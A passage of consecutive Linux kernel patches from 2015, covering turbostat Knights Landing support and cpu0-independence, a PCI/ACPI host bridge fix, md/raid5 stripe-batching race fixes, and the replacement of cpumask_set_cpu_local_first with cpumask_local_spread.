0x57: /* KNL */ return (rapl_dram_energy_units = 15.3 / 1000000); default: return (rapl_energy_units); @@ -2026,6 +2110,7 @@ void rapl_probe(unsigned int family, unsigned int model) case 0x3F: /* HSX */ case 0x4F: /* BDX */ case 0x56: /* BDX-DE */ + case 0x57: /* KNL */ do_rapl = RAPL_PKG | RAPL_DRAM | RAPL_DRAM_POWER_INFO | RAPL_DRAM_PERF_STATUS | RAPL_PKG_PERF_STATUS | RAPL_PKG_POWER_INFO; break; case 0x2D: @@ -2366,6 +2451,17 @@ int is_slm(unsigned int family, unsigned int model) return 0; } +int is_knl(unsigned int family, unsigned int model) +{ + if (!genuine_intel) + return 0; + switch (model) { + case 0x57: /* KNL */ + return 1; + } + return 0; +} + #define SLM_BCLK_FREQS 5 double slm_freq_table[SLM_BCLK_FREQS] = { 83.3, 100.0, 133.3, 116.7, 80.0}; @@ -2576,6 +2672,7 @@ void process_cpuid() do_c8_c9_c10 = has_hsw_msrs(family, model); do_skl_residency = has_skl_msrs(family, model); do_slm_cstates = is_slm(family, model); + do_knl_cstates = is_knl(family, model); bclk = discover_bclk(family, model); rapl_probe(family, model); From e9be7dd62899194ebdd90d417fc6c07d5d157912 Mon Sep 17 00:00:00 2001 From: Len Brown Date: Tue, 26 May 2015 12:19:37 -0400 Subject: [PATCH 329/872] tools/power turbostat: correctly decode of ENERGY_PERFORMANCE_BIAS When EPB is 0xF, turbosat was incorrectly describing it as "custom" instead of calling it "powersave": < cpu0: MSR_IA32_ENERGY_PERF_BIAS: 0x0000000f (custom) > cpu0: MSR_IA32_ENERGY_PERF_BIAS: 0x0000000f (powersave) Signed-off-by: Len Brown --- tools/power/x86/turbostat/turbostat.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/power/x86/turbostat/turbostat.c b/tools/power/x86/turbostat/turbostat.c index 256a5e1de381..f92211e9e70c 100644 --- a/tools/power/x86/turbostat/turbostat.c +++ b/tools/power/x86/turbostat/turbostat.c @@ -1919,7 +1919,7 @@ int print_epb(struct thread_data *t, struct core_data *c, struct pkg_data *p) if (get_msr(cpu, MSR_IA32_ENERGY_PERF_BIAS, &msr)) return 0; - switch (msr & 0x7) { + switch (msr & 0xF) { case ENERGY_PERF_BIAS_PERFORMANCE: epb_string = "performance"; break; From 7ce7d5de6dd08ee2a713ef13f4499073b4a72b7f Mon Sep 17 00:00:00 2001 From: Prarit Bhargava Date: Mon, 25 May 2015 08:34:28 -0400 Subject: [PATCH 330/872] tools/power turbostat: allow running without cpu0 Linux-3.7 added CONFIG_BOOTPARAM_HOTPLUG_CPU0, allowing systems to offline cpu0. But when cpu0 is offline, turbostat will not run: # turbostat ls turbostat: no /dev/cpu/0/msr This patch replaces the hard-coded use of cpu0 in turbostat with the current cpu, allowing it to run without a cpu0. Fewer cross-calls may also be needed due to use of current cpu, though this hard-coding was used only for the --debug preamble. Signed-off-by: Prarit Bhargava Signed-off-by: Len Brown --- tools/power/x86/turbostat/turbostat.c | 46 ++++++++++++++++++--------- 1 file changed, 31 insertions(+), 15 deletions(-) diff --git a/tools/power/x86/turbostat/turbostat.c b/tools/power/x86/turbostat/turbostat.c index f92211e9e70c..68e77fdd4c04 100644 --- a/tools/power/x86/turbostat/turbostat.c +++ b/tools/power/x86/turbostat/turbostat.c @@ -92,6 +92,7 @@ unsigned int do_gfx_perf_limit_reasons; unsigned int do_ring_perf_limit_reasons; unsigned int crystal_hz; unsigned long long tsc_hz; +int base_cpu; #define RAPL_PKG (1 << 0) /* 0x610 MSR_PKG_POWER_LIMIT */ @@ -1154,7 +1155,7 @@ dump_nhm_platform_info(void) unsigned long long msr; unsigned int ratio; - get_msr(0, MSR_NHM_PLATFORM_INFO, &msr); + get_msr(base_cpu, MSR_NHM_PLATFORM_INFO, &msr); fprintf(stderr, "cpu0: MSR_NHM_PLATFORM_INFO: 0x%08llx\n", msr); @@ -1166,7 +1167,7 @@ dump_nhm_platform_info(void) fprintf(stderr, "%d * %.0f = %.0f MHz base frequency\n", ratio, bclk, ratio * bclk); - get_msr(0, MSR_IA32_POWER_CTL, &msr); + get_msr(base_cpu, MSR_IA32_POWER_CTL, &msr); fprintf(stderr, "cpu0: MSR_IA32_POWER_CTL: 0x%08llx (C1E auto-promotion: %sabled)\n", msr, msr & 0x2 ? "EN" : "DIS"); @@ -1179,7 +1180,7 @@ dump_hsw_turbo_ratio_limits(void) unsigned long long msr; unsigned int ratio; - get_msr(0, MSR_TURBO_RATIO_LIMIT2, &msr); + get_msr(base_cpu, MSR_TURBO_RATIO_LIMIT2, &msr); fprintf(stderr, "cpu0: MSR_TURBO_RATIO_LIMIT2: 0x%08llx\n", msr); @@ -1201,7 +1202,7 @@ dump_ivt_turbo_ratio_limits(void) unsigned long long msr; unsigned int ratio; - get_msr(0, MSR_TURBO_RATIO_LIMIT1, &msr); + get_msr(base_cpu, MSR_TURBO_RATIO_LIMIT1, &msr); fprintf(stderr, "cpu0: MSR_TURBO_RATIO_LIMIT1: 0x%08llx\n", msr); @@ -1253,7 +1254,7 @@ dump_nhm_turbo_ratio_limits(void) unsigned long long msr; unsigned int ratio; - get_msr(0, MSR_TURBO_RATIO_LIMIT, &msr); + get_msr(base_cpu, MSR_TURBO_RATIO_LIMIT, &msr); fprintf(stderr, "cpu0: MSR_TURBO_RATIO_LIMIT: 0x%08llx\n", msr); @@ -1309,7 +1310,7 @@ dump_knl_turbo_ratio_limits(void) int delta_ratio; int i; - get_msr(0, MSR_NHM_TURBO_RATIO_LIMIT, &msr); + get_msr(base_cpu, MSR_NHM_TURBO_RATIO_LIMIT, &msr); fprintf(stderr, "cpu0: MSR_NHM_TURBO_RATIO_LIMIT: 0x%08llx\n", msr); @@ -1365,7 +1366,7 @@ dump_nhm_cst_cfg(void) { unsigned long long msr; - get_msr(0, MSR_NHM_SNB_PKG_CST_CFG_CTL, &msr); + get_msr(base_cpu, MSR_NHM_SNB_PKG_CST_CFG_CTL, &msr); #define SNB_C1_AUTO_UNDEMOTE (1UL << 27) #define SNB_C3_AUTO_UNDEMOTE (1UL << 28) @@ -1694,8 +1695,10 @@ void turbostat_loop() void check_dev_msr() { struct stat sb; + char pathname[32]; - if (stat("/dev/cpu/0/msr", &sb)) + sprintf(pathname, "/dev/cpu/%d/msr", base_cpu); + if (stat(pathname, &sb)) if (system("/sbin/modprobe msr > /dev/null 2>&1")) err(-5, "no /dev/cpu/0/msr, Try \"# modprobe msr\" "); } @@ -1708,6 +1711,7 @@ void check_permissions() cap_user_data_t cap_data = &cap_data_data; extern int capget(cap_user_header_t hdrp, cap_user_data_t datap); int do_exit = 0; + char pathname[32]; /* check for CAP_SYS_RAWIO */ cap_header->pid = getpid(); @@ -1722,7 +1726,8 @@ void check_permissions() } /* test file permissions */ - if (euidaccess("/dev/cpu/0/msr", R_OK)) { + sprintf(pathname, "/dev/cpu/%d/msr", base_cpu); + if (euidaccess(pathname, R_OK)) { do_exit++; warn("/dev/cpu/0/msr open failed, try chown or chmod +r /dev/cpu/*/msr"); } @@ -1804,7 +1809,7 @@ int probe_nhm_msrs(unsigned int family, unsigned int model) default: return 0; } - get_msr(0, MSR_NHM_SNB_PKG_CST_CFG_CTL, &msr); + get_msr(base_cpu, MSR_NHM_SNB_PKG_CST_CFG_CTL, &msr); pkg_cstate_limit = pkg_cstate_limits[msr & 0xF]; @@ -2043,7 +2048,7 @@ double get_tdp(model) unsigned long long msr; if (do_rapl & RAPL_PKG_POWER_INFO) - if (!get_msr(0, MSR_PKG_POWER_INFO, &msr)) + if (!get_msr(base_cpu, MSR_PKG_POWER_INFO, &msr)) return ((msr >> 0) & RAPL_POWER_GRANULARITY) * rapl_power_units; switch (model) { @@ -2126,7 +2131,7 @@ void rapl_probe(unsigned int family, unsigned int model) } /* units on package 0, verify later other packages match */ - if (get_msr(0, MSR_RAPL_POWER_UNIT, &msr)) + if (get_msr(base_cpu, MSR_RAPL_POWER_UNIT, &msr)) return; rapl_power_units = 1.0 / (1 << (msr & 0xF)); @@ -2471,7 +2476,7 @@ double slm_bclk(void) unsigned int i; double freq; - if (get_msr(0, MSR_FSB_FREQ, &msr)) + if (get_msr(base_cpu, MSR_FSB_FREQ, &msr)) fprintf(stderr, "SLM BCLK: unknown\n"); i = msr & 0xf; @@ -2539,7 +2544,7 @@ int set_temperature_target(struct thread_data *t, struct core_data *c, struct pk if (!do_nhm_platform_info) goto guess; - if (get_msr(0, MSR_IA32_TEMPERATURE_TARGET, &msr)) + if (get_msr(base_cpu, MSR_IA32_TEMPERATURE_TARGET, &msr)) goto guess; target_c_local = (msr >> 16) & 0xFF; @@ -2913,13 +2918,24 @@ void setup_all_buffers(void) for_all_proc_cpus(initialize_counters); } +void set_base_cpu(void) +{ + base_cpu = sched_getcpu(); + if (base_cpu < 0) + err(-ENODEV, "No valid cpus found"); + + if (debug > 1) + fprintf(stderr, "base_cpu = %d\n", base_cpu); +} + void turbostat_init() { + setup_all_buffers(); + set_base_cpu(); check_dev_msr(); check_permissions(); process_cpuid(); - setup_all_buffers(); if (debug) for_all_cpus(print_epb, ODD_COUNTERS); From a68c7c3ff0469d79993ee85e8e0a3a9a568ce350 Mon Sep 17 00:00:00 2001 From: Len Brown Date: Wed, 27 May 2015 18:00:39 -0400 Subject: [PATCH 331/872] tools/power turbostat: update version number to 4.7 Signed-off-by: Len Brown --- tools/power/x86/turbostat/turbostat.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/power/x86/turbostat/turbostat.c b/tools/power/x86/turbostat/turbostat.c index 68e77fdd4c04..323b65edfc97 100644 --- a/tools/power/x86/turbostat/turbostat.c +++ b/tools/power/x86/turbostat/turbostat.c @@ -3014,7 +3014,7 @@ int get_and_dump_counters(void) } void print_version() { - fprintf(stderr, "turbostat version 4.5 2 Apr, 2015" + fprintf(stderr, "turbostat version 4.7 27-May, 2015" " - Len Brown \n"); } From dc4fdaf0e4839109169d8261814813816951c75f Mon Sep 17 00:00:00 2001 From: "Rafael J. Wysocki" Date: Thu, 28 May 2015 01:39:53 +0200 Subject: [PATCH 332/872] PCI / ACPI: Do not set ACPI companions for host bridges with parents Commit 97badf873ab6 (device property: Make it possible to use secondary firmware nodes) uncovered a bug in the x86 (and ia64) PCI host bridge initialization code that assumes bridge->bus->sysdata to always point to a struct pci_sysdata object which need not be the case (in particular, the Xen PCI frontend driver sets it to point to a different data type). If it is not the case, an incorrect pointer (or a piece of data that is not a pointer at all) will be passed to ACPI_COMPANION_SET() and that may cause interesting breakage to happen going forward. To work around this problem use the observation that the ACPI host bridge initialization always passes NULL as parent to pci_create_root_bus(), so if pcibios_root_bridge_prepare() sees a non-NULL parent of the bridge, it should not attempt to set an ACPI companion for it, because that means that pci_create_root_bus() has been called by someone else. Fixes: 97badf873ab6 (device property: Make it possible to use secondary firmware nodes) Reported-and-tested-by: Sander Eikelenboom Signed-off-by: Rafael J. Wysocki Acked-by: Bjorn Helgaas --- arch/ia64/pci/pci.c | 13 ++++++++++--- arch/x86/pci/acpi.c | 13 ++++++++++--- 2 files changed, 20 insertions(+), 6 deletions(-) diff --git a/arch/ia64/pci/pci.c b/arch/ia64/pci/pci.c index d4e162d35b34..7cc3be9fa7c6 100644 --- a/arch/ia64/pci/pci.c +++ b/arch/ia64/pci/pci.c @@ -478,9 +478,16 @@ struct pci_bus *pci_acpi_scan_root(struct acpi_pci_root *root) int pcibios_root_bridge_prepare(struct pci_host_bridge *bridge) { - struct pci_controller *controller = bridge->bus->sysdata; - - ACPI_COMPANION_SET(&bridge->dev, controller->companion); + /* + * We pass NULL as parent to pci_create_root_bus(), so if it is not NULL + * here, pci_create_root_bus() has been called by someone else and + * sysdata is likely to be different from what we expect. Let it go in + * that case. + */ + if (!bridge->dev.parent) { + struct pci_controller *controller = bridge->bus->sysdata; + ACPI_COMPANION_SET(&bridge->dev, controller->companion); + } return 0; } diff --git a/arch/x86/pci/acpi.c b/arch/x86/pci/acpi.c index d93963340c3c..14a63ed6fe09 100644 --- a/arch/x86/pci/acpi.c +++ b/arch/x86/pci/acpi.c @@ -482,9 +482,16 @@ struct pci_bus *pci_acpi_scan_root(struct acpi_pci_root *root) int pcibios_root_bridge_prepare(struct pci_host_bridge *bridge) { - struct pci_sysdata *sd = bridge->bus->sysdata; - - ACPI_COMPANION_SET(&bridge->dev, sd->companion); + /* + * We pass NULL as parent to pci_create_root_bus(), so if it is not NULL + * here, pci_create_root_bus() has been called by someone else and + * sysdata is likely to be different from what we expect. Let it go in + * that case. + */ + if (!bridge->dev.parent) { + struct pci_sysdata *sd = bridge->bus->sysdata; + ACPI_COMPANION_SET(&bridge->dev, sd->companion); + } return 0; } From 2b6b24574256c05be145936f1493aec74c6904e5 Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Thu, 21 May 2015 15:10:01 +1000 Subject: [PATCH 333/872] md/raid5: ensure whole batch is delayed for all required bitmap updates. When we add a stripe to a batch, we need to be sure that head stripe will wait for the bitmap update required for the new stripe. Signed-off-by: NeilBrown --- drivers/md/raid5.c | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c index b9f2b9cc6060..c55a68f37c72 100644 --- a/drivers/md/raid5.c +++ b/drivers/md/raid5.c @@ -837,6 +837,15 @@ static void stripe_add_to_batch_list(struct r5conf *conf, struct stripe_head *sh < IO_THRESHOLD) md_wakeup_thread(conf->mddev->thread); + if (test_and_clear_bit(STRIPE_BIT_DELAY, &sh->state)) { + int seq = sh->bm_seq; + if (test_bit(STRIPE_BIT_DELAY, &sh->batch_head->state) && + sh->batch_head->bm_seq > seq) + seq = sh->batch_head->bm_seq; + set_bit(STRIPE_BIT_DELAY, &sh->batch_head->state); + sh->batch_head->bm_seq = seq; + } + atomic_inc(&sh->count); unlock_out: unlock_two_stripes(head, sh); From d0852df543e5aa7db34c1ad26d053782bcbf48f1 Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Wed, 27 May 2015 08:43:45 +1000 Subject: [PATCH 334/872] md/raid5: close race between STRIPE_BIT_DELAY and batching. When we add a write to a stripe we need to make sure the bitmap bit is set. While doing that the stripe is not locked so it could be added to a batch after which further changes to STRIPE_BIT_DELAY and ->bm_seq are ineffective. So we need to hold off adding to a stripe until bitmap_startwrite has completed at least once, and we need to avoid further changes to STRIPE_BIT_DELAY once the stripe has been added to a batch. If a bitmap_startwrite() completes after the stripe was added to a batch, it will not have set the bit, only incremented a counter, so no extra delay of the stripe is needed. Reported-by: Shaohua Li Signed-off-by: NeilBrown --- drivers/md/raid5.c | 25 ++++++++++++++++++++++--- drivers/md/raid5.h | 3 +++ 2 files changed, 25 insertions(+), 3 deletions(-) diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c index c55a68f37c72..42d0ea6c8597 100644 --- a/drivers/md/raid5.c +++ b/drivers/md/raid5.c @@ -749,6 +749,7 @@ static void unlock_two_stripes(struct stripe_head *sh1, struct stripe_head *sh2) static bool stripe_can_batch(struct stripe_head *sh) { return test_bit(STRIPE_BATCH_READY, &sh->state) && + !test_bit(STRIPE_BITMAP_PENDING, &sh->state) && is_full_stripe_write(sh); } @@ -2996,14 +2997,32 @@ static int add_stripe_bio(struct stripe_head *sh, struct bio *bi, int dd_idx, pr_debug("added bi b#%llu to stripe s#%llu, disk %d.\n", (unsigned long long)(*bip)->bi_iter.bi_sector, (unsigned long long)sh->sector, dd_idx); - spin_unlock_irq(&sh->stripe_lock); if (conf->mddev->bitmap && firstwrite) { + /* Cannot hold spinlock over bitmap_startwrite, + * but must ensure this isn't added to a batch until + * we have added to the bitmap and set bm_seq. + * So set STRIPE_BITMAP_PENDING to prevent + * batching. + * If multiple add_stripe_bio() calls race here they + * much all set STRIPE_BITMAP_PENDING. So only the first one + * to complete "bitmap_startwrite" gets to set + * STRIPE_BIT_DELAY. This is important as once a stripe + * is added to a batch, STRIPE_BIT_DELAY cannot be changed + * any more. + */ + set_bit(STRIPE_BITMAP_PENDING, &sh->state); + spin_unlock_irq(&sh->stripe_lock); bitmap_startwrite(conf->mddev->bitmap, sh->sector, STRIPE_SECTORS, 0); - sh->bm_seq = conf->seq_flush+1; - set_bit(STRIPE_BIT_DELAY, &sh->state); + spin_lock_irq(&sh->stripe_lock); + clear_bit(STRIPE_BITMAP_PENDING, &sh->state); + if (!sh->batch_head) { + sh->bm_seq = conf->seq_flush+1; + set_bit(STRIPE_BIT_DELAY, &sh->state); + } } + spin_unlock_irq(&sh->stripe_lock); if (stripe_can_batch(sh)) stripe_add_to_batch_list(conf, sh); diff --git a/drivers/md/raid5.h b/drivers/md/raid5.h index 7dc0dd86074b..01cdb9f3a0c4 100644 --- a/drivers/md/raid5.h +++ b/drivers/md/raid5.h @@ -337,6 +337,9 @@ enum { STRIPE_ON_RELEASE_LIST, STRIPE_BATCH_READY, STRIPE_BATCH_ERR, + STRIPE_BITMAP_PENDING, /* Being added to bitmap, don't add + * to batch yet. + */ }; #define STRIPE_EXPAND_SYNC_FLAG \ From f36963c9d3f6f415732710da3acdd8608a9fa0e5 Mon Sep 17 00:00:00 2001 From: Rusty Russell Date: Sat, 9 May 2015 03:14:13 +0930 Subject: [PATCH 335/872] cpumask_set_cpu_local_first => cpumask_local_spread, lament da91309e0a7e (cpumask: Utility function to set n'th cpu...) created a genuinely weird function. I never saw it before, it went through DaveM. (He only does this to make us other maintainers feel better about our own mistakes.) cpumask_set_cpu_local_first's purpose is say "I need to spread things across N online cpus, choose the ones on this numa node first"; you call it in a loop. It can fail. One of the two callers ignores this, the other aborts and fails the device open. It can fail in two ways: allocating the off-stack cpumask, or through a convoluted codepath which AFAICT can only occur if cpu_online_mask changes. Which shouldn't happen, because if cpu_online_mask can change while you call this, it could return a now-offline cpu anyway. It contains a nonsensical test "!cpumask_of_node(numa_node)". This was drawn to my attention by Geert, who said this causes a warning on Sparc. It sets a single bit in a cpumask instead of returning a cpu number, because that's what the callers want. It could be made more efficient by passing the previous cpu rather than an index, but that would be more invasive to the callers. Fixes: da91309e0a7e8966d916a74cce42ed170fde06bf Signed-off-by: Rusty Russell (then rebased) Tested-by: Amir Vadai Acked-by: Amir Vadai Acked-by: David S. Miller --- drivers/net/ethernet/emulex/benet/be_main.c | 6 +- .../net/ethernet/mellanox/mlx4/en_netdev.c | 10 +-- drivers/net/ethernet/mellanox/mlx4/en_tx.c | 6 +- include/linux/cpumask.h | 6 +- lib/cpumask.c | 74 +++++++------------ 5 files changed, 37 insertions(+), 65 deletions(-) diff --git a/drivers/net/ethernet/emulex/benet/be_main.c b/drivers/net/ethernet/emulex/benet/be_main.c index a6dcbf850c1f..6f9ffb9026cd 100644 --- a/drivers/net/ethernet/emulex/benet/be_main.c +++ b/drivers/net/ethernet/emulex/benet/be_main.c @@ -2358,11 +2358,11 @@ static int be_evt_queues_create(struct be_adapter *adapter) adapter->cfg_num_qs); for_all_evt_queues(adapter, eqo, i) { + int numa_node = dev_to_node(&adapter->pdev->dev); if (!zalloc_cpumask_var(&eqo->affinity_mask, GFP_KERNEL)) return -ENOMEM; - cpumask_set_cpu_local_first(i, dev_to_node(&adapter->pdev->dev), - eqo->affinity_mask); - + cpumask_set_cpu(cpumask_local_spread(i, numa_node), + eqo->affinity_mask); netif_napi_add(adapter->netdev, &eqo->napi, be_poll, BE_NAPI_WEIGHT); napi_hash_add(&eqo->napi); diff --git a/drivers/net/ethernet/mellanox/mlx4/en_netdev.c b/drivers/net/ethernet/mellanox/mlx4/en_netdev.c index 32f5ec737472..cf467a9f6cc7 100644 --- a/drivers/net/ethernet/mellanox/mlx4/en_netdev.c +++ b/drivers/net/ethernet/mellanox/mlx4/en_netdev.c @@ -1501,17 +1501,13 @@ static int mlx4_en_init_affinity_hint(struct mlx4_en_priv *priv, int ring_idx) { struct mlx4_en_rx_ring *ring = priv->rx_ring[ring_idx]; int numa_node = priv->mdev->dev->numa_node; - int ret = 0; if (!zalloc_cpumask_var(&ring->affinity_mask, GFP_KERNEL)) return -ENOMEM; - ret = cpumask_set_cpu_local_first(ring_idx, numa_node, - ring->affinity_mask); - if (ret) - free_cpumask_var(ring->affinity_mask); - - return ret; + cpumask_set_cpu(cpumask_local_spread(ring_idx, numa_node), + ring->affinity_mask); + return 0; } static void mlx4_en_free_affinity_hint(struct mlx4_en_priv *priv, int ring_idx) diff --git a/drivers/net/ethernet/mellanox/mlx4/en_tx.c b/drivers/net/ethernet/mellanox/mlx4/en_tx.c index f7bf312fb443..7bed3a88579f 100644 --- a/drivers/net/ethernet/mellanox/mlx4/en_tx.c +++ b/drivers/net/ethernet/mellanox/mlx4/en_tx.c @@ -144,9 +144,9 @@ int mlx4_en_create_tx_ring(struct mlx4_en_priv *priv, ring->queue_index = queue_index; if (queue_index < priv->num_tx_rings_p_up) - cpumask_set_cpu_local_first(queue_index, - priv->mdev->dev->numa_node, - &ring->affinity_mask); + cpumask_set_cpu(cpumask_local_spread(queue_index, + priv->mdev->dev->numa_node), + &ring->affinity_mask); *pring = ring; return 0; diff --git a/include/linux/cpumask.h b/include/linux/cpumask.h index 27e285b92b5f..59915ea5373c 100644 --- a/include/linux/cpumask.h +++ b/include/linux/cpumask.h @@ -151,10 +151,8 @@ static inline unsigned int cpumask_any_but(const struct cpumask *mask, return 1; } -static inline int cpumask_set_cpu_local_first(int i, int numa_node, cpumask_t *dstp) +static inline unsigned int cpumask_local_spread(unsigned int i, int node) { - set_bit(0, cpumask_bits(dstp)); - return 0; } @@ -208,7 +206,7 @@ static inline unsigned int cpumask_next_zero(int n, const struct cpumask *srcp) int cpumask_next_and(int n, const struct cpumask *, const struct cpumask *); int cpumask_any_but(const struct cpumask *mask, unsigned int cpu); -int cpumask_set_cpu_local_first(int i, int numa_node, cpumask_t *dstp); +unsigned int cpumask_local_spread(unsigned int i, int node); /** * for_each_cpu - iterate over every cpu in a mask diff --git a/lib/cpumask.c b/lib/cpumask.c index 830dd5dec40f..5f627084f2e9 100644 --- a/lib/cpumask.c +++ b/lib/cpumask.c @@ -139,64 +139,42 @@ void __init free_bootmem_cpumask_var(cpumask_var_t mask) #endif /** - * cpumask_set_cpu_local_first - set i'th cpu with local numa cpu's first - * + * cpumask_local_spread - select the i'th cpu with local numa cpu's first * @i: index number - * @numa_node: local numa_node - * @dstp: cpumask with the relevant cpu bit set according to the policy + * @node: local numa_node * - * This function sets the cpumask according to a numa aware policy. - * cpumask could be used as an affinity hint for the IRQ related to a - * queue. When the policy is to spread queues across cores - local cores - * first. + * This function selects an online CPU according to a numa aware policy; + * local cpus are returned first, followed by non-local ones, then it + * wraps around. * - * Returns 0 on success, -ENOMEM for no memory, and -EAGAIN when failed to set - * the cpu bit and need to re-call the function. + * It's not very efficient, but useful for setup. */ -int cpumask_set_cpu_local_first(int i, int numa_node, cpumask_t *dstp) +unsigned int cpumask_local_spread(unsigned int i, int node) { - cpumask_var_t mask; int cpu; - int ret = 0; - - if (!zalloc_cpumask_var(&mask, GFP_KERNEL)) - return -ENOMEM; + /* Wrap: we always want a cpu. */ i %= num_online_cpus(); - if (numa_node == -1 || !cpumask_of_node(numa_node)) { - /* Use all online cpu's for non numa aware system */ - cpumask_copy(mask, cpu_online_mask); + if (node == -1) { + for_each_cpu(cpu, cpu_online_mask) + if (i-- == 0) + return cpu; } else { - int n; - - cpumask_and(mask, - cpumask_of_node(numa_node), cpu_online_mask); - - n = cpumask_weight(mask); - if (i >= n) { - i -= n; - - /* If index > number of local cpu's, mask out local - * cpu's - */ - cpumask_andnot(mask, cpu_online_mask, mask); + /* NUMA first. */ + for_each_cpu_and(cpu, cpumask_of_node(node), cpu_online_mask) + if (i-- == 0) + return cpu; + + for_each_cpu(cpu, cpu_online_mask) { + /* Skip NUMA nodes, done above. */ + if (cpumask_test_cpu(cpu, cpumask_of_node(node))) + continue; + + if (i-- == 0) + return cpu; } } - - for_each_cpu(cpu, mask) { - if (--i < 0) - goto out; - } - - ret = -EAGAIN; - -out: - free_cpumask_var(mask); - - if (!ret) - cpumask_set_cpu(cpu, dstp); - - return ret; + BUG(); } -EXPORT_SYMBOL(cpumask_set_cpu_local_first); +EXPORT_SYMBOL(cpumask_local_spread); From b15a9dbdbfe72848b7ed4cd3f97fe80daaf99c89 Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Fri, 22 May 2015 15:20:04 +1000 Subject: [PATCH 336/872] md/raid5: Ensure a batch member is not handled prematurely. If a stripe is a member of a batch, but not the head, it must not be handled separately from the rest of the batch. 'clear_batch_ready()' handles this requirement to some extent but not completely. If a member is passed to handle_stripe() a second time it returns '0' indicating the stripe can be handled, which is wrong. So add an extra test. Signed-off-by: NeilBrown --- drivers/md/raid5.c | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c index 42d0ea6c8597..e58736740bac 100644 --- a/drivers/md/raid5.c +++ b/drivers/md/raid5.c @@ -4200,9 +4200,13 @@ static void analyse_stripe(struct stripe_head *sh, struct stripe_head_state *s) static int clear_batch_ready(struct stripe_head *sh) { + /* Return '1' if this is a member of batch, or + * '0' if it is a lone stripe or a head which can now be + * handled. + */ struct stripe_head *tmp; if (!test_and_clear_bit(STRIPE_BATCH_READY, &sh->state)) - return 0; + return (sh->batch_head && sh->batch_head != sh); spin_lock(&sh->stripe_lock); if (!sh->batch_head) { spin_unlock(&sh->stripe_lock); From 4e3d62ff4976f26d22b8b91572a49136bb3a23f1 Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Thu, 21 May 2015 11:50:16 +1000 Subject: [PATCH 337/872] md/raid5: remove condition test from check_break_stripe_batch_list. handle_stripe_clean_event() contains a chunk of code very similar to check_break_stripe_batch_list(). If we make the latter more like the former, we can end up with just one copy of this code. This first step removed the condition (and the 'check_') part of the name. This has the added advantage of making it clear what check is being performed at the point where the function is called. Signed-off-by: NeilBrown --- drivers/md/raid5.c | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c index e58736740bac..fc5c4039c394 100644 --- a/drivers/md/raid5.c +++ b/drivers/md/raid5.c @@ -4234,16 +4234,11 @@ static int clear_batch_ready(struct stripe_head *sh) return 0; } -static void check_break_stripe_batch_list(struct stripe_head *sh) +static void break_stripe_batch_list(struct stripe_head *head_sh) { - struct stripe_head *head_sh, *next; + struct stripe_head *sh, *next; int i; - if (!test_and_clear_bit(STRIPE_BATCH_ERR, &sh->state)) - return; - - head_sh = sh; - list_for_each_entry_safe(sh, next, &head_sh->batch_list, batch_list) { list_del_init(&sh->batch_list); @@ -4290,7 +4285,8 @@ static void handle_stripe(struct stripe_head *sh) return; } - check_break_stripe_batch_list(sh); + if (test_and_clear_bit(STRIPE_BATCH_ERR, &sh->state)) + break_stripe_batch_list(sh); if (test_bit(STRIPE_SYNC_REQUESTED, &sh->state) && !sh->batch_head) { spin_lock(&sh->stripe_lock); From fb642b92c267beeefd352af9bc461eac93a7552c Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Thu, 21 May 2015 12:00:47 +1000 Subject: [PATCH 338/872] md/raid5: duplicate some more handle_stripe_clean_event code in break_stripe_batch_list break_stripe_batch list didn't clear head_sh->batch_head. This was probably a bug. Also clear all R5_Overlap flags and if any were cleared, wake up 'wait_for_overlap'. This isn't always necessary but the worst effect is a little extra checking for code that is waiting on wait_for_overlap. Also, don't use wake_up_nr() because that does the wrong thing if 'nr' is zero, and it number of flags cleared doesn't strongly correlate with the number of threads to wake. Signed-off-by: NeilBrown --- drivers/md/raid5.c | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c index fc5c4039c394..6de2e1edd492 100644 --- a/drivers/md/raid5.c +++ b/drivers/md/raid5.c @@ -3557,7 +3557,8 @@ static void handle_stripe_clean_event(struct r5conf *conf, spin_lock_irq(&head_sh->stripe_lock); head_sh->batch_head = NULL; spin_unlock_irq(&head_sh->stripe_lock); - wake_up_nr(&conf->wait_for_overlap, wakeup_nr); + if (wakeup_nr) + wake_up(&conf->wait_for_overlap); if (head_sh->state & STRIPE_EXPAND_SYNC_FLAG) set_bit(STRIPE_HANDLE, &head_sh->state); } @@ -4238,6 +4239,7 @@ static void break_stripe_batch_list(struct stripe_head *head_sh) { struct stripe_head *sh, *next; int i; + int do_wakeup = 0; list_for_each_entry_safe(sh, next, &head_sh->batch_list, batch_list) { @@ -4250,10 +4252,12 @@ static void break_stripe_batch_list(struct stripe_head *head_sh) STRIPE_EXPAND_SYNC_FLAG)); sh->check_state = head_sh->check_state; sh->reconstruct_state = head_sh->reconstruct_state; - for (i = 0; i < sh->disks; i++) + for (i = 0; i < sh->disks; i++) { + if (test_and_clear_bit(R5_Overlap, &sh->dev[i].flags)) + do_wakeup = 1; sh->dev[i].flags = head_sh->dev[i].flags & (~((1 << R5_WriteError) | (1 << R5_Overlap))); - + } spin_lock_irq(&sh->stripe_lock); sh->batch_head = NULL; spin_unlock_irq(&sh->stripe_lock); @@ -4261,6 +4265,15 @@ static void break_stripe_batch_list(struct stripe_head *head_sh) set_bit(STRIPE_HANDLE, &sh->state); release_stripe(sh); } + spin_lock_irq(&head_sh->stripe_lock); + head_sh->batch_head = NULL; + spin_unlock_irq(&head_sh->stripe_lock); + for (i = 0; i < head_sh->disks; i++) + if (test_and_clear_bit(R5_Overlap, &head_sh->dev[i].flags)) + do_wakeup = 1; + + if (do_wakeup) + wake_up(&head_sh->raid_conf->wait_for_overlap); } static void handle_stripe(struct stripe_head *sh) From 3960ce796198254b7a1b420dc9a26d80928523bd Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Thu, 21 May 2015 12:20:36 +1000 Subject: [PATCH 339/872] md/raid5: add 